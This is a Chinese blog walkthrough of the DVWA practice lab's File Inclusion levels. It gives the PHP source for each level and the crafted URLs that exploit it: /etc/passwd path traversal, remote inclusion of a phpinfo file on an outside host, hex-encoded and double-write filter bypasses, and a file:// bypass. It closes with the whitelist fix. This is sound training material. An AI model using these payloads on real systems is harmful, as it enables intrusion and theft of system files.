

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="儒道易行">
  <meta name="keywords" content="">
  
    <meta name="description" content="4.File Inclusion1.File Inclusion(Low) 相关代码分析 123456&lt;?php &#x2F;&#x2F; The page we wish to display$file &#x3D; $_GET[ &amp;#x27;page&amp;#x27; ]; ?&gt;  可以看到，服务器端对page参数没有做任何的过滤跟检查。 服务器期望用户的操作是点击下面的三个链接，服务器会包含相应的文件，并将结果返回">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA-File Inclusion">
<meta property="og:url" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/index.html">
<meta property="og:site_name" content="儒道易行">
<meta property="og:description" content="4.File Inclusion1.File Inclusion(Low) 相关代码分析 123456&lt;?php &#x2F;&#x2F; The page we wish to display$file &#x3D; $_GET[ &amp;#x27;page&amp;#x27; ]; ?&gt;  可以看到，服务器端对page参数没有做任何的过滤跟检查。 服务器期望用户的操作是点击下面的三个链接，服务器会包含相应的文件，并将结果返回">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/image-20221223165256899.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784153221.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784165667.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784176023.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784188229.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784198308.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784239368.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784251238.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784278763.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784285937.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784292741.png">
<meta property="og:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784351245.png">
<meta property="article:published_time" content="2018-09-26T13:36:15.000Z">
<meta property="article:modified_time" content="2022-12-25T06:56:51.819Z">
<meta property="article:author" content="儒道易行">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://rdyx0.github.io/2018/09/26/DVWA-File%20Inclusion/clipboard.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>DVWA-File Inclusion - 儒道易行</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"rdyx0.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>儒道易行</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="DVWA-File Inclusion"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2018-09-26 21:36" pubdate>
          2018年9月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          34 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">DVWA-File Inclusion</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="4-File-Inclusion"><a href="#4-File-Inclusion" class="headerlink" title="4.File Inclusion"></a>4.File Inclusion</h1><h2 id="1-File-Inclusion-Low"><a href="#1-File-Inclusion-Low" class="headerlink" title="1.File Inclusion(Low)"></a>1.File Inclusion(Low)</h2><p> 相关代码分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-comment">// The page we wish to display</span><br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;page&#x27;</span> ];<br> <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>可以看到，服务器端对page参数没有做任何的过滤跟检查。</p>
<p>服务器期望用户的操作是点击下面的三个链接，服务器会包含相应的文件，并将结果返回。需要特别说明的是，服务器包含文件时，不管文件后缀是否是php，都会尝试当做php文件执行，如果文件内容确为php，则会正常执行并返回结果，如果不是，则会原封不动地打印文件内容，所以文件包含漏洞常常会导致任意文件读取与任意命令执行。</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>点击file1.php后，显示如下</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/image-20221223165256899.png" srcset="/img/loading.gif" lazyload alt="image-20221223165256899"></p>
<p>而现实中，恶意的攻击者是不会乖乖点击这些链接的，因此page参数是不可控的。</p>
<p>本地文件包含，构造url，利用绝对路径:</p>
<p>&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;&#x2F;etc&#x2F;passwd</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784153221.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>构造url，利用相对路径:</p>
<p>&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784165667.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>远程文件包含，web公网上其它网站上有一个phpinfo文件，<a target="_blank" rel="noopener" href="http://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php">http://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php</a></p>
<p>构造url，成功读取到文件</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=http://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=http://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php</a></p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784176023.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>将远程文件的url进行hex编码后也可以成功执行</p>
<p>%68%74%74%70%3a%2f%2f%34%37%2e%39%34%2e%39%2e%32%32%34%3a%38%33%2f%76%75%6c%2f%75%6e%73%61%66%65%75%70%6c%6f%61%64%2f%75%70%6c%6f%61%64%73%2f%70%68%70%69%6e%66%6f%2e%70%68%70</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=http://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=%68%74%74%70%3a%2f%2f%34%37%2e%39%34%2e%39%2e%32%32%34%3a%38%33%2f%76%75%6c%2f%75%6e%73%61%66%65%75%70%6c%6f%61%64%2f%75%70%6c%6f%61%64%73%2f%70%68%70%69%6e%66%6f%2e%70%68%70</a></p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784188229.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以利用文件上传漏洞上传的phpinfo文件，在此处进行包含(详情见文件上传靶场，此处直接利用)，构造url：</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=http://43.247.91.228:81/hackable/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=http://43.247.91.228:81/hackable/uploads/phpinfo.php</a></p>
<p>成功进行包含</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784198308.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="2-File-Inclusion-Medium"><a href="#2-File-Inclusion-Medium" class="headerlink" title="2.File Inclusion(Medium)"></a>2.File Inclusion(Medium)</h2><p>相关代码分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-comment">// The page we wish to display</span><br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;page&#x27;</span> ];<br> <br><span class="hljs-comment">// Input validation</span><br><span class="hljs-variable">$file</span> = <span class="hljs-title function_ invoke__">str_replace</span>( <span class="hljs-keyword">array</span>( <span class="hljs-string">&quot;http://&quot;</span>, <span class="hljs-string">&quot;https://&quot;</span> ), <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$file</span> );<br><span class="hljs-variable">$file</span> = <span class="hljs-title function_ invoke__">str_replace</span>( <span class="hljs-keyword">array</span>( <span class="hljs-string">&quot;../&quot;</span>, <span class="hljs-string">&quot;..\&quot;&quot;</span> ), <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$file</span> );<br> <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>可以看到，Medium级别的代码增加了str_replace函数，对page参数进行了一定的处理，将”http:&#x2F;&#x2F; ”、”https:&#x2F;&#x2F;”、 ” ..&#x2F;”、”..\”替换为空字符，即删除。</p>
<p>服务器虽然过滤了相对路径，但是并没有有过滤绝对路径, 所以依然可以用绝对路径包含文件</p>
<p>本地文件包含，构造url</p>
<p>&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;&#x2F;etc&#x2F;passwd</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784239368.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用str_replace函数是极其不安全的，因为可以使用双写绕过替换规则。</p>
<p>例如page&#x3D;ht<a target="_blank" rel="noopener" href="http://tp//192.168.5.12/phpinfo.txt%E6%97%B6%EF%BC%8Cstr_replace%E5%87%BD%E6%95%B0%E4%BC%9A%E5%B0%86http://%E5%88%A0%E9%99%A4%EF%BC%8C%E4%BA%8E%E6%98%AFpage=http://192.168.5.12/phpinfo.txt%EF%BC%8C%E6%88%90%E5%8A%9F%E6%89%A7%E8%A1%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E3%80%82">http://tp://192.168.5.12/phpinfo.txt时，str_replace函数会将http://删除，于是page=http://192.168.5.12/phpinfo.txt，成功执行远程命令。</a></p>
<p>构造url</p>
<p>&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;…&#x2F;.&#x2F;…&#x2F;.&#x2F;…&#x2F;.&#x2F;…&#x2F;.&#x2F;…&#x2F;.&#x2F;etc&#x2F;passwd</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784251238.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>远程文件包含，构造url，包含其他网站的phpinfo文件</p>
<p>&#x2F;vulnerabilities&#x2F;fi&#x2F;?page&#x3D;ht<a target="_blank" rel="noopener" href="http://tp//47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php">http://tp://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php</a></p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784278763.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>将远程文件的url进行hex编码后也可以成功执行</p>
<p>%68%74%68%74%74%70%3a%2f%2f%74%70%3a%2f%2f%34%37%2e%39%34%2e%39%2e%32%32%34%3a%38%33%2f%76%75%6c%2f%75%6e%73%61%66%65%75%70%6c%6f%61%64%2f%75%70%6c%6f%61%64%73%2f%70%68%70%69%6e%66%6f%2e%70%68%70</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=hthttp://tp://47.94.9.224:83/vul/unsafeupload/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=%68%74%68%74%74%70%3a%2f%2f%74%70%3a%2f%2f%34%37%2e%39%34%2e%39%2e%32%32%34%3a%38%33%2f%76%75%6c%2f%75%6e%73%61%66%65%75%70%6c%6f%61%64%2f%75%70%6c%6f%61%64%73%2f%70%68%70%69%6e%66%6f%2e%70%68%70</a></p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784285937.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以利用文件上传漏洞上传的phpinfo文件，在此处进行包含(详情见文件上传靶场，此处直接利用)，构造url：</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=hthttp://tp://43.247.91.228:81/hackable/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=hthttp://tp://43.247.91.228:81/hackable/uploads/phpinfo.php</a></p>
<p>成功进行包含</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784292741.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="3-File-Inclusion-High"><a href="#3-File-Inclusion-High" class="headerlink" title="3.File Inclusion(High)"></a>3.File Inclusion(High)</h2><p>相关代码分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-comment">// The page we wish to display</span><br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;page&#x27;</span> ];<br> <br><span class="hljs-comment">// Input validation</span><br><span class="hljs-keyword">if</span>( !<span class="hljs-title function_ invoke__">fnmatch</span>( <span class="hljs-string">&quot;file*&quot;</span>, <span class="hljs-variable">$file</span> ) &amp;&amp; <span class="hljs-variable">$file</span> != <span class="hljs-string">&quot;include.php&quot;</span> ) &#123;<br>	<span class="hljs-comment">// This isn&#x27;t the page we want!</span><br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ERROR: File not found!&quot;</span>;<br>	<span class="hljs-keyword">exit</span>;<br>&#125;<br> <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>High级别的代码使用了fnmatch函数检查page参数，要求page参数的开头必须是file，服务器才会去包含相应的文件。</p>
<p>对url进行修改，可以利用文件上传漏洞上传的phpinfo文件，在此处进行包含(详情见文件上传靶场，此处直接利用)</p>
<p>构造url：</p>
<p><a target="_blank" rel="noopener" href="http://43.247.91.228:81/vulnerabilities/fi/?page=file:///var/www/html/hackable/uploads/phpinfo.php">http://43.247.91.228:81/vulnerabilities/fi/?page=file:///var/www/html/hackable/uploads/phpinfo.php</a></p>
<p>成功进行包含</p>
<p><img src="/2018/09/26/DVWA-File%20Inclusion/clipboard-1671784351245.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="4-File-Inclusion-Impossible"><a href="#4-File-Inclusion-Impossible" class="headerlink" title="4.File Inclusion(Impossible)"></a>4.File Inclusion(Impossible)</h2><p>相关代码分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br> <br><span class="hljs-comment">// The page we wish to display</span><br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;page&#x27;</span> ];<br> <br><span class="hljs-comment">// Only allow include.php or file&#123;1..3&#125;.php</span><br><span class="hljs-keyword">if</span>( <span class="hljs-variable">$file</span> != <span class="hljs-string">&quot;include.php&quot;</span> &amp;&amp; <span class="hljs-variable">$file</span> != <span class="hljs-string">&quot;file1.php&quot;</span> &amp;&amp; <span class="hljs-variable">$file</span> != <span class="hljs-string">&quot;file2.php&quot;</span> &amp;&amp; <span class="hljs-variable">$file</span> != <span class="hljs-string">&quot;file3.php&quot;</span> ) &#123;<br>	<span class="hljs-comment">// This isn&#x27;t the page we want!</span><br>	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;ERROR: File not found!&quot;</span>;<br>	<span class="hljs-keyword">exit</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>可以看到，Impossible级别的代码使用了白名单机制进行防护，简单粗暴，page参数必须为“include.php”、“file1.php”、“file2.php”、“file3.php”之一，彻底杜绝了文件包含漏洞。 </p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>DVWA-File Inclusion</div>
      <div>http://rdyx0.github.io/2018/09/26/DVWA-File Inclusion/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>儒道易行</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2018年9月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2018/09/27/DVWA-File%20Upload/" title="DVWA-File Upload">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">DVWA-File Upload</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2018/09/25/DVWA-CSRF/" title="DVWA-CSRF">
                        <span class="hidden-mobile">DVWA-CSRF</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://github.com/rdyx0" target="_blank" rel="nofollow noopener"><span>儒道易行</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
